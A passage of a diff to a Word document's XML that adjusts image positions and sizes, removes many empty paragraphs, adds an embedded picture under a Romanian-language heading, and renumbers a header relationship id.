-              <wp:align>center</wp:align>
+              <wp:posOffset>0</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
+              <wp:posOffset>113665</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="5943600" cy="6220460"/>
+            <wp:extent cx="5943600" cy="6124575"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
             <wp:docPr id="8" name="Image8" descr=""/>
@@ -1314,7 +1314,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="6220460"/>
+                      <a:ext cx="5943600" cy="6124575"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1329,614 +1329,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -1964,132 +1356,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading3"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
@@ -2118,6 +1384,246 @@
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="10">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>19050</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>149225</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5893435" cy="6303645"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="9" name="Image9" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="9" name="Image9" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5893435" cy="6303645"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:left="1080" w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -2288,7 +1794,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId10"/>
+      <w:headerReference w:type="default" r:id="rId11"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
